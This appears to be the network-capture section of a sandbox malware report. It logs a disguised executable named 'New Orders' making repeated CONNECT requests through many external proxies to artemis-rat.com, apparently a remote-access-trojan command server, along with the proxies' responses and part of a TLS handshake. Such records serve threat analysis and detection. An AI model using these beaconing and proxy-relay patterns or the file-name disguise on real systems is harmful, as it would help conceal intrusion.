                                                                                        Mar 11, 2024 16:17:27.132498026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:39.132517099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:03.132668018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:51.163849115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1734192.168.2.950501109.86.220.1241537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:50.937263966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1735192.168.2.954912223.113.80.15890917672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:50.939428091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.392842054 CET325INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.12.1
                                                                                        Date: Mon, 11 Mar 2024 15:16:53 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 173
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1736192.168.2.954951203.112.134.7456787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:50.939918041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1737192.168.2.955016158.255.215.50169937672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:50.940175056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.242526054 CET339INHTTP/1.1 403 Forbidden
                                                                                        Server: squid/4.7
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:51 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 5
                                                                                        X-Squid-Error: TCP_RESET 0
                                                                                        Vary: Accept-Language
                                                                                        Content-Language: en
                                                                                        X-Cache: MISS from proxy.wakoopa.com
                                                                                        Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 72 65 73 65 74
                                                                                        Data Ascii: reset


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1738192.168.2.95502572.10.164.178220177672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:50.940288067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1739192.168.2.954470166.62.38.10063227672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:50.940318108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1740192.168.2.955028192.111.130.5170027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:50.940517902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1741192.168.2.9550198.217.143.187156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:50.940912962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1742192.168.2.95492951.68.164.77168927672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:50.951693058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.960833073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.476598024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1743192.168.2.95355572.206.181.97649437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:50.968355894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1744192.168.2.95356198.188.47.15041457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:50.968633890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1745192.168.2.95501342.49.148.16790017672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.065223932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.524370909 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1746192.168.2.95359031.220.78.244807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.065300941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.105324030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.113764048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.132597923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.159207106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:27.241871119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:39.257479906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:03.320187092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1747192.168.2.95503127.76.193.21310807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.067253113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1748192.168.2.950668193.8.87.4344447672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.067316055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1749192.168.2.95504779.110.202.13180817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.067394018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1750192.168.2.95365179.110.201.23580817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.068965912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1751192.168.2.955008117.160.250.13288997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.069109917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.630259037 CET303INHTTP/1.1 400 Bad Request
                                                                                        Server: openresty
                                                                                        Date: Mon, 11 Mar 2024 15:16:51 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 154
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1752192.168.2.953535194.31.79.75509207672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.069824934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.070230007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.164491892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.164277077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.163957119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1753192.168.2.95505343.153.174.44437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.070811987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1754192.168.2.955054140.84.176.2464437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.070897102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1755192.168.2.955022175.183.82.22181977672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.072741985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1756192.168.2.95472868.71.249.153486067672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.074328899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1757192.168.2.955026103.153.154.6807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.074585915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1758192.168.2.954953117.160.250.13188997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.078843117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.721643925 CET303INHTTP/1.1 400 Bad Request
                                                                                        Server: openresty
                                                                                        Date: Mon, 11 Mar 2024 15:16:51 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 154
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1759192.168.2.954542193.122.98.131287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.086911917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1760192.168.2.9550498.217.95.4488997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.094326973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1761192.168.2.954509112.78.155.77807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.094476938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.683451891 CET19INHTTP/1.1 200 OK
                                                                                        Mar 11, 2024 16:16:52.683856010 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ef 20 64 7e ce 45 ee 93 c7 83 ed 8f 28 c5 e6 1d 83 3a ba 85 09 be 6b 1b fa 6f a9 4b ee de 15 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: lhe d~E(:koK*,+0/$#('=<5/artemis-rat.com#0x}fNI&}&WCBo5DMv$qYrm
                                                                                        Mar 11, 2024 16:16:53.049770117 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ef 20 64 aa 03 5c f7 4b 5b 31 d2 ed 35 e9 da 4f 75 1c e0 bd b2 5f f5 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                                        Data Ascii: C?e d\K[15Ou_DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                                        Mar 11, 2024 16:16:53.049778938 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                                                                        Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
